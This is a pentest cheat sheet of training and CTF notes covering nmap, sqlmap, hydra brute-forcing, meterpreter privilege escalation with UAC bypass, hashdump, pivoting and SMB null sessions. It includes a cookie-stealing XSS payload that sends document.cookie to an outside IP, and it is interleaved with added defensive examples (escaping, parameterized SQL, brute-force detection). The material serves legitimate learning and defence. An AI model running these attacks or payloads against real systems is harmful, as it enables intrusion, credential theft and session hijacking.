Zerotistic/note-pentest
pentest cheat sheet

note of the different commands / informations received during my training for the eJPT, OSCP, and during CTF / box on hackthebox.

nmap

nmap -sn ip/24 -oN discovery.nmap
cat discovery.nmap | grep "for" | cut -d " " -f 5 > ips.txt
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open

add -O to find the OS
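The grep/cut pipeline above takes the fifth space-separated field of every "Nmap scan report for ..." line. That is the IP only when nmap printed no name: once reverse DNS resolves, nmap writes "Nmap scan report for host (ip)" and field 5 is the hostname, and with -v the down hosts get a report line too. Running the discovery scan with -n avoids the first problem; the parser below (an added example, not part of the cheat sheet, run against a constructed -oN sample) handles both forms and keeps only hosts that were actually up:

```python
import re
import sys
from ipaddress import ip_address

# Constructed sample of `nmap -sn ... -oN discovery.nmap` output (not a real scan).
# Line 4 shows the form nmap emits when reverse DNS resolves a name; the
# "[host down]" line only appears when the scan is run with -v.
SAMPLE_NMAP_ON = """\
# Nmap 7.94 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sn -v -oN discovery.nmap 10.0.0.0/29
Nmap scan report for 10.0.0.1
Host is up (0.0010s latency).
Nmap scan report for gateway.lab.internal (10.0.0.2)
Host is up (0.0020s latency).
Nmap scan report for 10.0.0.3 [host down]
Nmap scan report for printer.lab.internal (10.0.0.4)
Host is up (0.0050s latency).
# Nmap done at Mon Jan  1 10:00:05 2024 -- 8 IP addresses (3 hosts up) scanned in 5.00 seconds
"""

REPORT_RE = re.compile(
    r"^Nmap scan report for (?P<name>\S+)"
    r"(?: \((?P<ip>[0-9a-fA-F.:]+)\))?"
    r"(?P<down> \[host down\])?$"
)

def parse_live_hosts(text):
    """Return [(ip, hostname_or_None), ...] for every host nmap reported as up."""
    hosts = []
    pending = None  # report line seen, waiting for its "Host is up" line
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            pending = None
            if m.group("down"):
                continue
            # With a resolved name the IP sits in parentheses; otherwise the
            # "name" field is the IP itself.
            ip = m.group("ip") or m.group("name")
            name = m.group("name") if m.group("ip") else None
            try:
                ip_address(ip)
            except ValueError:
                continue  # not an address we understand; skip rather than guess
            pending = (ip, name)
        elif pending and line.startswith("Host is up"):
            hosts.append(pending)
            pending = None
    return hosts

def live_ips(text):
    """Just the addresses, one per entry, ready to be written to ips.txt."""
    return [ip for ip, _ in parse_live_hosts(text)]

def cut_field5(text):
    """Approximates the sheet's `grep "for" | cut -d " " -f 5` for comparison."""
    out = []
    for line in text.splitlines():
        if "for" in line:
            fields = line.split(" ")
            if len(fields) >= 5:
                out.append(fields[4])
    return out

if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_ON
    print("\n".join(live_ips(text)))
```

Usage: `python3 parse_discovery.py discovery.nmap > ips.txt`. On the sample, cut_field5 yields a hostname and a down host among the "IPs", which the later -iL service scan would then either fail to resolve or waste time on; parse_live_hosts yields only the three live addresses.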

gobuster

gobuster -u 'url' -w /path/to/dir-list-med.txt
-U user
-P pass

mysql

connect
> mysql -u user -pPASS -h mysql_server --port=
see database
> show databases;
> use database_name;
see table
> show tables;
see content of tables
> SELECT * FROM accounts;

use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
--> xp_cmdshell is Enabled
--> remote access is Enabled
use exploit/windows/mssql/mssql_payload 

xss

<script>new Image().src="http://192.168.99.11/get.php?a="+document.cookie;</script>
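That payload only works when the page echoes a parameter into HTML unescaped and the session cookie is readable from JavaScript. The following is an added example (not from the cheat sheet) of the two fixes side by side: escaping at the HTML text sink, and marking the cookie HttpOnly so document.cookie does not expose it. The payload string is reused as constructed test input; `session` is an assumed cookie name.

```python
import html
from http.cookies import SimpleCookie

# The reflected payload from the sheet above, used here as constructed test input.
PAYLOAD = '<script>new Image().src="http://192.168.99.11/get.php?a="+document.cookie;</script>'

def render_unsafe(display_name):
    """Vulnerable: the request parameter is concatenated straight into HTML."""
    return f"<p>Hello {display_name}</p>"

def render_safe(display_name):
    """Hardened: escape at the HTML text sink. quote=True also covers ' and \"."""
    return f"<p>Hello {html.escape(display_name, quote=True)}</p>"

def session_cookie_header(session_id):
    """Defence in depth: HttpOnly keeps document.cookie from exposing the session id,
    Secure stops it going over plain HTTP, SameSite=Lax limits cross-site sending."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    return jar["session"].OutputString()

def is_script_free(rendered):
    """Quick check used below: no executable <script ...> tag survived rendering."""
    return "<script" not in rendered.lower()

if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_safe(PAYLOAD))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```

html.escape is the right tool for an HTML text or attribute context only; a value dropped into a JavaScript block, a URL or a CSS rule needs that context's own encoding, which is why the cookie flag matters as a second layer.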

sqli

test for sqli with sqlmap
> sqlmap -u 'website/?id='
see tables
> sqlmap -u 'website' --tables
dump tables 
> sqlmap -u 'website/?id=vuln' --dump -T table_name
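What sqlmap is probing for in `?id=` is a query that pastes the parameter into SQL text. As an added example (not from the cheat sheet), the vulnerable lookup beside its parameterized form, on a constructed in-memory SQLite table named after the `accounts` table dumped above; the `1 OR 1=1` input is the classic tautology test:

```python
import sqlite3

def make_db():
    """In-memory table shaped like the `accounts` table the sheet dumps (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO accounts (id, username, role) VALUES (?, ?, ?)",
        [(1, "alice", "user"), (2, "bob", "user"), (3, "admin", "admin")],
    )
    conn.commit()
    return conn

def lookup_vulnerable(conn, id_param):
    """Vulnerable: `?id=` is pasted into the SQL text, so it can change the query."""
    query = f"SELECT username FROM accounts WHERE id = {id_param}"
    return [row[0] for row in conn.execute(query)]

def lookup_parameterized(conn, id_param):
    """Hardened: the value is bound as a parameter and can only ever be data.
    SQLite applies the column's INTEGER affinity to the bound text, so "2" still
    matches id 2, while "1 OR 1=1" is compared as one literal string and matches nothing."""
    return [row[0] for row in conn.execute(
        "SELECT username FROM accounts WHERE id = ?", (id_param,))]

def lookup_validated(conn, id_param):
    """Belt and braces: reject anything that is not an integer before it reaches the DB."""
    if not str(id_param).isdigit():
        return []
    return lookup_parameterized(conn, int(id_param))

if __name__ == "__main__":
    db = make_db()
    for value in ("2", "1 OR 1=1"):
        print(repr(value), "vulnerable ->", lookup_vulnerable(db, value),
              "| parameterized ->", lookup_parameterized(db, value))
```

The vulnerable version returns every username for the tautology input, which is exactly the difference sqlmap's boolean-based checks look for; the parameterized version returns nothing for it and still finds id 2 for "2".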

crack pass

SSH
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ssh://ip -v -I

FTP
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ftp://ip -v -I

TELNET
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt telnet://ip -v -I

john file_to_crack
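From the defender's side, the hydra runs above leave a very recognisable trace: many "Failed password" lines for several usernames from one source inside a few seconds, often followed by an "Accepted" line from the same source. The detector below is an added example (not from the cheat sheet) that runs over a constructed OpenSSH auth.log excerpt; the 60-second window and threshold of 5 are assumed values:

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed OpenSSH auth.log excerpt (not from a real host): one source hammering
# several usernames in a few seconds, then getting in; one ordinary user typo.
SAMPLE_AUTH_LOG = """\
Jan  1 10:00:01 box sshd[1201]: Failed password for invalid user admin from 10.0.0.50 port 41000 ssh2
Jan  1 10:00:02 box sshd[1202]: Failed password for invalid user test from 10.0.0.50 port 41002 ssh2
Jan  1 10:00:02 box sshd[1203]: Failed password for root from 10.0.0.50 port 41004 ssh2
Jan  1 10:00:03 box sshd[1204]: Failed password for root from 10.0.0.50 port 41006 ssh2
Jan  1 10:00:03 box sshd[1205]: Failed password for alice from 10.0.0.50 port 41008 ssh2
Jan  1 10:00:04 box sshd[1206]: Failed password for alice from 10.0.0.50 port 41010 ssh2
Jan  1 10:00:09 box sshd[1207]: Accepted password for alice from 10.0.0.50 port 41012 ssh2
Jan  1 10:05:00 box sshd[1300]: Failed password for bob from 10.0.0.7 port 50000 ssh2
Jan  1 10:05:30 box sshd[1301]: Accepted publickey for bob from 10.0.0.7 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

def parse_events(text, year=2024):
    """Return (timestamp, result, user, source_ip) tuples; syslog lines carry no year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_bruteforce(events, window=timedelta(seconds=60), threshold=5):
    """Flag any source IP with >= threshold failures inside one sliding window.
    Returns {ip: {"failures": total, "users": distinct usernames tried,
                  "success_after": True if a login succeeded at or after the last failure}}."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "Failed"]
        start, peak = 0, 0
        for end in range(len(fails)):
            # shrink the window from the left until it spans at most `window`
            while fails[end][0] - fails[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        last_fail = fails[-1][0]
        alerts[ip] = {
            "failures": len(fails),
            "users": len({e[2] for e in fails}),
            "success_after": any(e[1] == "Accepted" and e[0] >= last_fail for e in evs),
        }
    return alerts

if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_events(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

The "users" count is what separates a -L wordlist run from one user mistyping a password, and "success_after" is the case that needs immediate follow-up rather than just a block rule. The same shape of rule works for the FTP and telnet daemons' logs once the regex is adjusted to their line format.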

metasploit

search XXX
use XXX
show payload
show options

set payload windows/meterpreter/reverse_tcp (or linux/meterpreter/reverse_tcp)

background = background current session
sessions -l 
sessions -i X

getuid
getsystem
-->IF IT FAILS
background
search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit
getuid
getsystem

shell

search -f file_to_search

hashdump (then johntheripper to crack)

ssh

to log in with a private key (id_rsa)

copy the key to ~/.ssh/id_rsa and chmod 600 ~/.ssh/id_rsa (ssh refuses a key readable by others)
ssh -i ~/.ssh/id_rsa user@ip
enter the key's passphrase if asked (-i takes the private key; the .pub half is what sits in the server's authorized_keys)

dns


null session

perl enum4linux -a <ip>
a <20> NetBIOS name entry --> server service (file sharing) is running, carry on

smbclient -L //<ip> -N

connect without pass
smbclient //<ip>/SHARE_NAME -N

routing

ip route add subnet/24 via <ip>

1) background meterpreter session 
2) use post/multi/manage/autoroute 
3) set SESSION 1 
4) set SUBNET 172.16.50.0 
5) set CMD add 
6) run

find creds on windows

cd /

dir /s /b passwords.txt

dir /s /b credentials.txt
